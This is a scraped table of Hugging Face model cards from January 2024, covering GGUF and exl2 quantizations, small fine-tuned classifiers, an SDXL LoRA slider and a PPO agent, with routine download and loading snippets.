modelId | author | last_modified | downloads | likes | library_name | tags | pipeline_tag | createdAt | card |
---|---|---|---|---|---|---|---|---|---|
s3nh/Gorgon-7b-v0.1-GGUF | s3nh | 2024-01-22T08:10:33Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"text-generation",
"zh",
"en",
"license:openrail",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T07:01:11Z |
---
license: openrail
pipeline_tag: text-generation
library_name: transformers
language:
- zh
- en
---
## Original model card
Buy me a coffee if you like this project ;)
<a href="https://www.buymeacoffee.com/s3nh"><img src="https://www.buymeacoffee.com/assets/img/guidelines/download-assets-sm-1.svg" alt=""></a>
#### Description
GGUF-format model files for [this project](https://huggingface.co/openerotica/Gorgon-7b-v0.1).
### GGUF Specs
GGUF is a format based on the existing GGJT, but makes a few changes to the format to make it more extensible and easier to use. The following features are desired:
- Single-file deployment: they can be easily distributed and loaded, and do not require any external files for additional information.
- Extensible: new features can be added to GGML-based executors/new information can be added to GGUF models without breaking compatibility with existing models.
- mmap compatibility: models can be loaded using mmap for fast loading and saving.
- Easy to use: models can be easily loaded and saved using a small amount of code, with no need for external libraries, regardless of the language used.
- Full information: all information needed to load a model is contained in the model file, and no additional information needs to be provided by the user.
The key difference between GGJT and GGUF is the use of a key-value structure for the hyperparameters (now referred to as metadata), rather than a list of untyped values. This allows for new metadata to be added without breaking compatibility with existing models, and to annotate the model with additional information that may be useful for inference or for identifying the model.
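As a rough illustration of the single-file, mmap-friendly loading described above, a GGUF file from this repo can typically be run with `llama-cpp-python`. This is only a sketch; the filename below is a hypothetical example rather than an actual file listed here.
```python
# Minimal sketch, assuming llama-cpp-python is installed and a quantized GGUF file
# from this repo has been downloaded locally (the filename is hypothetical).
from llama_cpp import Llama

llm = Llama(model_path="./Gorgon-7b-v0.1.Q4_K_M.gguf", n_ctx=2048)  # single file, mmap-loaded by default
output = llm("User: Explain what quantization is.\nAssistant:", max_tokens=128)
print(output["choices"][0]["text"])
```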
### Inference
User: Tell me story about what is an quantization and what do we need to build.
{{user}}: So, the first thing that you need to know about an quiz, or a test for that matter, is that there are two types of questions; one-way and two-way. A one way question is like this: "Does the sun shine?" A two way question is like this: "What is your favorite color? Is it red, blue, or green?"
The main difference is that a two-way question has more possible answers than a one-way question does. Now, when you build an quiz, you have to make sure that the questions are in order of
# Original model card
|
s3nh/mistral-7b-lamia-v0.1-GGUF | s3nh | 2024-01-22T08:10:22Z | 0 | 0 | transformers | [
"transformers",
"gguf",
"text-generation",
"zh",
"en",
"license:openrail",
"endpoints_compatible",
"region:us",
"conversational"
] | text-generation | 2024-01-22T06:57:19Z |
---
license: openrail
pipeline_tag: text-generation
library_name: transformers
language:
- zh
- en
---
## Original model card
Buy me a coffee if you like this project ;)
<a href="https://www.buymeacoffee.com/s3nh"><img src="https://www.buymeacoffee.com/assets/img/guidelines/download-assets-sm-1.svg" alt=""></a>
#### Description
GGUF-format model files for [this project](https://huggingface.co/openerotica/mistral-7b-lamia-v0.1).
### GGUF Specs
GGUF is a format based on the existing GGJT, but makes a few changes to the format to make it more extensible and easier to use. The following features are desired:
- Single-file deployment: they can be easily distributed and loaded, and do not require any external files for additional information.
- Extensible: new features can be added to GGML-based executors/new information can be added to GGUF models without breaking compatibility with existing models.
- mmap compatibility: models can be loaded using mmap for fast loading and saving.
- Easy to use: models can be easily loaded and saved using a small amount of code, with no need for external libraries, regardless of the language used.
- Full information: all information needed to load a model is contained in the model file, and no additional information needs to be provided by the user.
The key difference between GGJT and GGUF is the use of a key-value structure for the hyperparameters (now referred to as metadata), rather than a list of untyped values. This allows for new metadata to be added without breaking compatibility with existing models, and to annotate the model with additional information that may be useful for inference or for identifying the model.
### Inference
User: Tell me story about what is an quantization and what do we need to build.
# Original model card
|
Doowon96/bert-base-finetuned-ynat | Doowon96 | 2024-01-22T08:09:46Z | 10 | 0 | transformers | [
"transformers",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"ko",
"base_model:klue/bert-base",
"base_model:finetune:klue/bert-base",
"license:cc-by-sa-4.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-16T15:36:48Z | ---
license: cc-by-sa-4.0
base_model: klue/bert-base
tags:
- generated_from_trainer
metrics:
- f1
model-index:
- name: bert-base-finetuned-ynat
results: []
language:
- ko
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# bert-base-finetuned-ynat
This model is a fine-tuned version of [klue/bert-base](https://huggingface.co/klue/bert-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3745
- F1: 0.8704
## Model description
Given a news headline as input, the model predicts its news category:
label_map = {
'LABEL_0': 'IT/과학',
'LABEL_1': '경제',
'LABEL_2': '사회',
'LABEL_3': '생활문화',
'LABEL_4': '세계',
'LABEL_5': '스포츠',
'LABEL_6': '정치'
}
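For reference, a minimal way to try the classifier (a sketch, assuming the standard `transformers` pipeline API; the example headline is made up, and the English glosses in the comments are translations of the labels above, not model output):
```python
# Sketch: classify a Korean news headline with this checkpoint.
from transformers import pipeline

classifier = pipeline("text-classification", model="Doowon96/bert-base-finetuned-ynat")

# Label glosses (translated from the mapping above):
# LABEL_0 IT/Science, LABEL_1 Economy, LABEL_2 Society, LABEL_3 Lifestyle/Culture,
# LABEL_4 World, LABEL_5 Sports, LABEL_6 Politics
print(classifier("삼성전자, 새 인공지능 반도체 공개"))  # hypothetical headline -> [{'label': 'LABEL_0', 'score': ...}]
```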
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 256
- eval_batch_size: 256
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:----:|:---------------:|:------:|
| No log | 1.0 | 179 | 0.3909 | 0.8655 |
| No log | 2.0 | 358 | 0.3788 | 0.8684 |
| 0.3774 | 3.0 | 537 | 0.3629 | 0.8699 |
| 0.3774 | 4.0 | 716 | 0.3776 | 0.8667 |
| 0.3774 | 5.0 | 895 | 0.3745 | 0.8704 |
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0 |
silvercoder45/Mistral-7b-instruct-v0.2-summ-sft-dpo-e1 | silvercoder45 | 2024-01-22T08:04:33Z | 0 | 0 | null | [
"safetensors",
"license:cc-by-nc-4.0",
"region:us"
] | null | 2024-01-22T08:01:59Z | ---
license: cc-by-nc-4.0
---
A description of how to load and test the model will be added soon. More details on training and data will be added as well.
### **Loading the Model**
Use the following Python code to load the model:
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
TBD
```
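Until the snippet above is filled in, a standard loading pattern would presumably look like the following (an assumption based on the usual `transformers` API, not official instructions from the author):
```python
# Sketch only: assumes this checkpoint loads like a regular causal LM.
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_id = "silvercoder45/Mistral-7b-instruct-v0.2-summ-sft-dpo-e1"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id, torch_dtype=torch.float16, device_map="auto")  # device_map needs accelerate
```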
### **Generating Text**
To generate text, use the following Python code:
```python
text = "Hi, my name is "
inputs = tokenizer(text, return_tensors="pt").to(model.device)  # keep inputs on the same device as the model
outputs = model.generate(**inputs, max_new_tokens=64)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
``` |
ayeshgk/codet5-small-ft-v4 | ayeshgk | 2024-01-22T07:59:05Z | 7 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:Salesforce/codet5-small",
"base_model:finetune:Salesforce/codet5-small",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-22T06:55:26Z | ---
license: apache-2.0
base_model: Salesforce/codet5-small
tags:
- generated_from_trainer
metrics:
- rouge
model-index:
- name: codet5-small-ft-v4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# codet5-small-ft-v4
This model is a fine-tuned version of [Salesforce/codet5-small](https://huggingface.co/Salesforce/codet5-small) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: 0.4863
- Rouge1: 63.4219
- Rouge2: 52.7146
- Rougel: 62.9897
- Rougelsum: 62.9844
- Gen Len: 17.0139
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 16
- eval_batch_size: 16
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 4
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Rouge1 | Rouge2 | Rougel | Rougelsum | Gen Len |
|:-------------:|:-----:|:-----:|:---------------:|:-------:|:-------:|:-------:|:---------:|:-------:|
| 0.6991 | 1.0 | 3063 | 0.5867 | 61.4049 | 50.9933 | 60.9107 | 60.9129 | 17.1624 |
| 0.6145 | 2.0 | 6126 | 0.5189 | 62.4441 | 51.6001 | 62.0291 | 62.02 | 16.9374 |
| 0.5615 | 3.0 | 9189 | 0.4973 | 63.3391 | 52.7352 | 62.9065 | 62.9124 | 17.1099 |
| 0.5491 | 4.0 | 12252 | 0.4863 | 63.4219 | 52.7146 | 62.9897 | 62.9844 | 17.0139 |
### Framework versions
- Transformers 4.38.0.dev0
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
bartowski/FuseLLM-7B-exl2 | bartowski | 2024-01-22T07:58:54Z | 4 | 3 | transformers | [
"transformers",
"llama",
"open-llama",
"mpt",
"model-fusion",
"text-generation",
"en",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-22T07:44:55Z | ---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
tags:
- llama
- open-llama
- mpt
- model-fusion
library_name: transformers
quantized_by: bartowski
---
## Exllama v2 Quantizations of FuseLLM-7B
Using <a href="https://github.com/turboderp/exllamav2/releases/tag/v0.0.11">turboderp's ExLlamaV2 v0.0.11</a> for quantization.
# The "main" branch only contains the measurement.json, download one of the other branches for the model (see below)
Each branch contains an individual bits per weight, with the main one containing only the meaurement.json for further conversions.
Original model: https://huggingface.co/Wanfq/FuseLLM-7B
No GQA - VRAM requirements will be higher
| Branch | Bits | lm_head bits | Size (4k) | Size (16k) | Description |
| -------------------------------------------------------------- | ---- | ------------ | --------- | ---------- | ----------- |
| [8_0](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/8_0) | 8.0 | 8.0 | 9.4 GB | 15.6 GB | Maximum quality that ExLlamaV2 can produce, near unquantized performance. |
| [6_5](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/6_5) | 6.5 | 8.0 | 8.6 GB | 14.8 GB | Near unquantized performance at vastly reduced size, **recommended**. |
| [5_0](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/5_0) | 5.0 | 6.0 | 7.2 GB | 13.4 GB | Slightly lower quality vs 6.5, but usable on 8GB cards with 4k context. |
| [4_25](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/4_25) | 4.25 | 6.0 | 6.5 GB | 12.7 GB | GPTQ equivalent bits per weight. |
| [3_5](https://huggingface.co/Bartowski/FuseLLM-7B-exl2/tree/3_5) | 3.5 | 6.0 | 5.9 GB | 12.1 GB | Lower quality, not recommended. |
VRAM requirements are listed for both 4k and 16k context, since without GQA the difference between them is substantial (6.2 GB).
## Download instructions
With git:
```shell
git clone --single-branch --branch 6_5 https://huggingface.co/bartowski/FuseLLM-7B-exl2 FuseLLM-7B-exl2-6_5
```
With huggingface hub (credit to TheBloke for instructions):
```shell
pip3 install huggingface-hub
```
To download the `main` branch (only useful if you just need the measurement.json) to a folder called `FuseLLM-7B-exl2`:
```shell
mkdir FuseLLM-7B-exl2
huggingface-cli download bartowski/FuseLLM-7B-exl2 --local-dir FuseLLM-7B-exl2 --local-dir-use-symlinks False
```
To download from a different branch, add the `--revision` parameter:
```shell
mkdir FuseLLM-7B-exl2-6_5
huggingface-cli download bartowski/FuseLLM-7B-exl2 --revision 6_5 --local-dir FuseLLM-7B-exl2-6_5 --local-dir-use-symlinks False
```
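If you prefer Python over the CLI, the same per-branch download can normally be done with `huggingface_hub.snapshot_download` (a sketch, not part of the original instructions):
```python
# Sketch: Python equivalent of the CLI commands above.
from huggingface_hub import snapshot_download

snapshot_download(
    repo_id="bartowski/FuseLLM-7B-exl2",
    revision="6_5",                    # branch name, i.e. the bits-per-weight variant you want
    local_dir="FuseLLM-7B-exl2-6_5",
)
```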
|
CLMBR/binding-c-command-lstm-4 | CLMBR | 2024-01-22T07:50:56Z | 1 | 0 | transformers | [
"transformers",
"pytorch",
"rnn",
"generated_from_trainer",
"endpoints_compatible",
"region:us"
] | null | 2024-01-17T22:31:45Z | ---
tags:
- generated_from_trainer
model-index:
- name: binding-c-command-lstm-4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# binding-c-command-lstm-4
This model is a fine-tuned version of [](https://huggingface.co/) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 3.9687
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 4
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- training_steps: 3052726
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:-----:|:-------:|:---------------:|
| 4.7856 | 0.03 | 76320 | 4.7511 |
| 4.4985 | 1.03 | 152640 | 4.4704 |
| 4.3544 | 0.03 | 228960 | 4.3357 |
| 4.2708 | 1.03 | 305280 | 4.2525 |
| 4.2053 | 0.03 | 381600 | 4.1959 |
| 4.1611 | 1.03 | 457920 | 4.1555 |
| 4.1268 | 0.03 | 534240 | 4.1252 |
| 4.095 | 1.03 | 610560 | 4.1008 |
| 4.065 | 0.03 | 686880 | 4.0814 |
| 4.0414 | 1.03 | 763200 | 4.0668 |
| 4.0161 | 0.03 | 839520 | 4.0543 |
| 4.0017 | 1.03 | 915840 | 4.0434 |
| 3.9845 | 0.03 | 992160 | 4.0340 |
| 3.965 | 1.03 | 1068480 | 4.0263 |
| 3.9529 | 0.03 | 1144800 | 4.0194 |
| 3.9447 | 1.03 | 1221120 | 4.0126 |
| 3.9305 | 0.03 | 1297440 | 4.0084 |
| 3.9213 | 1.03 | 1373760 | 4.0040 |
| 3.9105 | 0.03 | 1450080 | 4.0001 |
| 3.9091 | 1.03 | 1526400 | 3.9960 |
| 3.9015 | 0.03 | 1602720 | 3.9935 |
| 3.8989 | 1.03 | 1679040 | 3.9909 |
| 3.8955 | 0.03 | 1755360 | 3.9881 |
| 3.8936 | 1.03 | 1831680 | 3.9862 |
| 3.8824 | 0.03 | 1908000 | 3.9842 |
| 3.8737 | 1.03 | 1984320 | 3.9818 |
| 3.8655 | 0.03 | 2060640 | 3.9800 |
| 3.8649 | 1.03 | 2136960 | 3.9790 |
| 3.8601 | 0.03 | 2213280 | 3.9775 |
| 3.852 | 1.03 | 2289600 | 3.9766 |
| 3.845 | 0.03 | 2365920 | 3.9753 |
| 3.8457 | 1.03 | 2442240 | 3.9744 |
| 3.8399 | 0.03 | 2518560 | 3.9734 |
| 3.8385 | 1.03 | 2594880 | 3.9727 |
| 3.8308 | 0.03 | 2671200 | 3.9718 |
| 3.8376 | 1.03 | 2747520 | 3.9709 |
| 3.8319 | 0.03 | 2823840 | 3.9702 |
| 3.8359 | 1.03 | 2900160 | 3.9696 |
| 3.8381 | 0.03 | 2976480 | 3.9691 |
| 3.8358 | 1.02 | 3052726 | 3.9687 |
### Framework versions
- Transformers 4.33.3
- Pytorch 2.0.1
- Datasets 2.12.0
- Tokenizers 0.13.3
|
bplow/halu_detect_v3 | bplow | 2024-01-22T07:40:03Z | 0 | 0 | peft | [
"peft",
"safetensors",
"arxiv:1910.09700",
"base_model:mistralai/Mistral-7B-Instruct-v0.2",
"base_model:adapter:mistralai/Mistral-7B-Instruct-v0.2",
"region:us"
] | null | 2024-01-22T07:39:48Z | ---
library_name: peft
base_model: mistralai/Mistral-7B-Instruct-v0.2
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
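In the absence of an official snippet, and given that the adapter declares `mistralai/Mistral-7B-Instruct-v0.2` as its base model, a typical PEFT loading pattern would presumably be:
```python
# Sketch only: assumes this repo is a standard PEFT/LoRA adapter for the declared base model.
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

base_id = "mistralai/Mistral-7B-Instruct-v0.2"
tokenizer = AutoTokenizer.from_pretrained(base_id)
base_model = AutoModelForCausalLM.from_pretrained(base_id, device_map="auto")
model = PeftModel.from_pretrained(base_model, "bplow/halu_detect_v3")
```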
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
### Framework versions
- PEFT 0.7.1 |
satcos/LunarLander-v2.1 | satcos | 2024-01-22T07:31:29Z | 0 | 0 | null | [
"tensorboard",
"LunarLander-v2",
"ppo",
"deep-reinforcement-learning",
"reinforcement-learning",
"custom-implementation",
"deep-rl-course",
"model-index",
"region:us"
] | reinforcement-learning | 2024-01-22T07:31:20Z | ---
tags:
- LunarLander-v2
- ppo
- deep-reinforcement-learning
- reinforcement-learning
- custom-implementation
- deep-rl-course
model-index:
- name: PPO
results:
- task:
type: reinforcement-learning
name: reinforcement-learning
dataset:
name: LunarLander-v2
type: LunarLander-v2
metrics:
- type: mean_reward
value: -144.87 +/- 87.53
name: mean_reward
verified: false
---
# PPO Agent Playing LunarLander-v2
This is a trained model of a PPO agent playing LunarLander-v2.
# Hyperparameters
```python
{'exp_name': 'ppo'
'seed': 1
'torch_deterministic': True
'cuda': True
'track': False
'wandb_project_name': 'cleanRL'
'wandb_entity': None
'capture_video': False
'env_id': 'LunarLander-v2'
'total_timesteps': 50000
'learning_rate': 0.00025
'num_envs': 4
'num_steps': 128
'anneal_lr': True
'gae': True
'gamma': 0.99
'gae_lambda': 0.95
'num_minibatches': 4
'update_epochs': 4
'norm_adv': True
'clip_coef': 0.2
'clip_vloss': True
'ent_coef': 0.01
'vf_coef': 0.5
'max_grad_norm': 0.5
'target_kl': None
'repo_id': 'satcos/LunarLander-v2.1'
'batch_size': 512
'minibatch_size': 128}
```
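For reference, the `batch_size` and `minibatch_size` entries above follow from the rollout settings via the usual cleanRL-style derivation (a quick check, not code from this repo):
```python
# Sanity check of the derived sizes in the hyperparameter dict above.
num_envs = 4
num_steps = 128
num_minibatches = 4

batch_size = num_envs * num_steps               # 4 * 128 = 512
minibatch_size = batch_size // num_minibatches  # 512 // 4 = 128
print(batch_size, minibatch_size)               # 512 128, matching the values above
```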
|
ntc-ai/SDXL-LoRA-slider.terrifying | ntc-ai | 2024-01-22T07:24:26Z | 266 | 2 | diffusers | [
"diffusers",
"text-to-image",
"stable-diffusion-xl",
"lora",
"template:sd-lora",
"template:sdxl-lora",
"sdxl-sliders",
"ntcai.xyz-sliders",
"concept",
"en",
"base_model:stabilityai/stable-diffusion-xl-base-1.0",
"base_model:adapter:stabilityai/stable-diffusion-xl-base-1.0",
"license:mit",
"region:us"
] | text-to-image | 2024-01-22T07:24:23Z |
---
language:
- en
thumbnail: "images/evaluate/terrifying.../terrifying_17_3.0.png"
widget:
- text: terrifying
output:
url: images/terrifying_17_3.0.png
- text: terrifying
output:
url: images/terrifying_19_3.0.png
- text: terrifying
output:
url: images/terrifying_20_3.0.png
- text: terrifying
output:
url: images/terrifying_21_3.0.png
- text: terrifying
output:
url: images/terrifying_22_3.0.png
tags:
- text-to-image
- stable-diffusion-xl
- lora
- template:sd-lora
- template:sdxl-lora
- sdxl-sliders
- ntcai.xyz-sliders
- concept
- diffusers
license: "mit"
inference: false
instance_prompt: "terrifying"
base_model: "stabilityai/stable-diffusion-xl-base-1.0"
---
# ntcai.xyz slider - terrifying (SDXL LoRA)
| Strength: -3 | Strength: 0 | Strength: 3 |
| --- | --- | --- |
| <img src="images/terrifying_17_-3.0.png" width=256 height=256 /> | <img src="images/terrifying_17_0.0.png" width=256 height=256 /> | <img src="images/terrifying_17_3.0.png" width=256 height=256 /> |
| <img src="images/terrifying_19_-3.0.png" width=256 height=256 /> | <img src="images/terrifying_19_0.0.png" width=256 height=256 /> | <img src="images/terrifying_19_3.0.png" width=256 height=256 /> |
| <img src="images/terrifying_20_-3.0.png" width=256 height=256 /> | <img src="images/terrifying_20_0.0.png" width=256 height=256 /> | <img src="images/terrifying_20_3.0.png" width=256 height=256 /> |
## Download
Weights for this model are available in Safetensors format.
## Trigger words
You can apply this LoRA with trigger words for additional effect:
```
terrifying
```
## Use in diffusers
```python
from diffusers import StableDiffusionXLPipeline
from diffusers import EulerAncestralDiscreteScheduler
import torch
pipe = StableDiffusionXLPipeline.from_single_file("https://huggingface.co/martyn/sdxl-turbo-mario-merge-top-rated/blob/main/topRatedTurboxlLCM_v10.safetensors")
pipe.to("cuda")
pipe.scheduler = EulerAncestralDiscreteScheduler.from_config(pipe.scheduler.config)
# Load the LoRA
pipe.load_lora_weights('ntc-ai/SDXL-LoRA-slider.terrifying', weight_name='terrifying.safetensors', adapter_name="terrifying")
# Activate the LoRA
pipe.set_adapters(["terrifying"], adapter_weights=[2.0])
prompt = "medieval rich kingpin sitting in a tavern, terrifying"
negative_prompt = "nsfw"
width = 512
height = 512
num_inference_steps = 10
guidance_scale = 2
image = pipe(prompt, negative_prompt=negative_prompt, width=width, height=height, guidance_scale=guidance_scale, num_inference_steps=num_inference_steps).images[0]
image.save('result.png')
```
## Support the Patreon
If you like this model please consider [joining our Patreon](https://www.patreon.com/NTCAI).
By joining our Patreon, you'll gain access to an ever-growing library of over 1140+ unique and diverse LoRAs, covering a wide range of styles and genres. You'll also receive early access to new models and updates, exclusive behind-the-scenes content, and the powerful LoRA slider creator, allowing you to craft your own custom LoRAs and experiment with endless possibilities.
Your support on Patreon will allow us to continue developing and refining new models.
## Other resources
- [CivitAI](https://civitai.com/user/ntc) - Follow ntc on Civit for even more LoRAs
- [ntcai.xyz](https://ntcai.xyz) - See ntcai.xyz to find more articles and LoRAs
|
Elizezen/AINovelist-6.8B-initialized | Elizezen | 2024-01-22T07:21:08Z | 7 | 0 | transformers | [
"transformers",
"safetensors",
"gptj",
"text-generation",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-19T05:15:14Z | This is an untrained model generated purely from the parameter information of AI Novelist (AIのべりすと). If you have a powerful enough GPU, you might be able to reproduce the original by pretraining this model. Or you might not. |
eaglewatch/CBT_model_3 | eaglewatch | 2024-01-22T07:15:07Z | 90 | 0 | transformers | [
"transformers",
"pytorch",
"t5",
"text2text-generation",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-22T07:01:14Z | Tinnitus THI Prediction Model.
Trained with the augmentation dataset #3
license: apache-2.0
language: en
metrics: rouge
pipeline_tag: text2text-generation
tags: psychology
|
4kew/bert-finetuned-squad | 4kew | 2024-01-22T07:13:48Z | 33 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"bert",
"question-answering",
"generated_from_trainer",
"base_model:google-bert/bert-base-cased",
"base_model:finetune:google-bert/bert-base-cased",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | question-answering | 2024-01-11T03:37:34Z | ---
license: apache-2.0
base_model: bert-base-cased
tags:
- generated_from_trainer
model-index:
- name: bert-finetuned-squad
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# bert-finetuned-squad
This model is a fine-tuned version of [bert-base-cased](https://huggingface.co/bert-base-cased) on an unknown dataset.
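Since the card does not include a usage snippet, here is a hedged sketch of running the checkpoint with the question-answering pipeline (standard `transformers` API; the question and context are made-up examples):
```python
# Sketch: extractive QA with this checkpoint.
from transformers import pipeline

qa = pipeline("question-answering", model="4kew/bert-finetuned-squad")
result = qa(
    question="Where is the Eiffel Tower located?",   # hypothetical example
    context="The Eiffel Tower is a wrought-iron lattice tower in Paris, France.",
)
print(result)  # {'score': ..., 'start': ..., 'end': ..., 'answer': ...}
```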
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 3
- mixed_precision_training: Native AMP
### Training results
### Framework versions
- Transformers 4.36.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
karawalla/mistral_b_karawalla_aqtraining24006 | karawalla | 2024-01-22T07:11:49Z | 0 | 0 | transformers | [
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2024-01-21T20:37:23Z | ---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
